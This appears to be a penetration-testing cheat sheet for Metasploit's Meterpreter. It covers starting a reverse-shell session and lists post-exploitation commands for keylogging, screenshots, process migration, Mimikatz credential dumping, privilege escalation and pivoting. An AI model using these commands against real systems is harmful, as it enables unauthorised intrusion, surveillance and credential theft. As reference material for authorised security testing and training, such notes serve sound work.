Creating a Session
To create a session, a Meterpreter payload must be executed on the target machine. A meterpreter payload can be handled by exploit/multi/handler
.
In order to create a session, first generate and upload a Meterpreter reverse shell payload. Modify $IP
and $PORT
as needed.
On the attacker machine, run the following in msfconsole
. See advanced
for encoding the stager.
Use Automigration on Windows!
If meterpreter is embedded into a binary (e.g., with
shellter
) or injected on stack, then the connection will die when meterpreter finishes. This can be prevented with migration. To do so, runset AutoRunScript post/windows/manage/migrate
.
Run the uploaded shell executable on the vulnerable host.
The meterpreter session should be created momentarily in the Metasploit console.
Transport
Meterpreter allows an attacker to change the type of traffic used.
Meterpreter Usage
General
sysinfo
: gather basic info about remote machineshell
: launches a shell
File Transfer
upload LOCAL REMOTE
: upload file to remote machinedownload REMOTE LOCAL
: download file to local machine
Peeping
Note that these command run under the current user. Migrate as necessary.
screenshot
: captures a screenshotkeyscan_start
to start keyloggingkeyscan_dump
to dump current keylog resultskeyscan_stop
to stop keylogging
Process Management & Migration
ps
: list processesmigrate PID
: migrate to PID given sufficient privileges (target process should have the same privilege or lower as current process)
Post-exploitation Modules
Using a windows UAC bypass as an example (this one works on Falls Creator update at least)
Extensions
load EXTENSION
: load a given extensionload powershell
: load powershell extensionpowershell_execute "$PSVersionTable.PSVersion"
: get PS version
load kiwi
: load Mimikatzgetsystem
: try to elavate to SYSTEM from high integrity shellcreds_msv
: dump MSV credentials
Pivoting
portfwd add -l LOCAL -p REMOTE -r REMOTE_IP